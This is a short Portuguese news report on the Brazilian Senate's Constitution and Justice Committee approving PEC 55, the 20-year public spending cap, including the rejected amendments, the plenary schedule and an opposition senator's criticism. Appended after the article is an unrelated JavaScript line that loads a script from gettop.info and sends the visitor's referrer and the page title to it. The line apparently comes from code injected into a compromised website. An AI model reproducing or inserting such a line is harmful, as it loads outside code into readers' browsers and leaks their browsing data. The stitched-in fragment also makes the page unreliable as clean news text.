A Comissão de Constituição e Justiça do Senado aprovou hoje (9) a Proposta de Emenda à Constituição que estabelece o limite para os gastos públicos nos próximos 20 anos, PEC 55. O relatório do senador Eunício Oliveira (PMDB-CE) foi aprovado como texto base. Os senadores vão agora apreciar uma emenda que foi destacada para votação em separado.
Foram apresentadas 59 emendas ao texto propondo alterações como a mudança no prazo de duração das medidas, a exclusão de algumas áreas do limite de gastos e a realização de um referendo para que a PEC entre em vigor. O relator recomendou a rejeição de todas. Dois destaques foram apresentados, mas um foi indeferido pelo presidente da Comissão.
Depois que for concluída a aprovação na CCJ, a matéria seguirá para votação no plenário. Pelo cronograma estabelecido pelo presidente do Senado, Renan Calheiros (PMDB-AL), e líderes partidários, a proposta do governo do presidente Michel Temer será votada pelo plenário em primeiro turno em 29 de novembro e, em segundo turno, em 13 de dezembro.
O senador Humberto Costa (PT-PE) é um dos críticos à proposta de emenda à Constituição. Ele adverte que os setores sociais mais fracos e menos articulados serão prejudicados caso a proposta seja aprovada.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;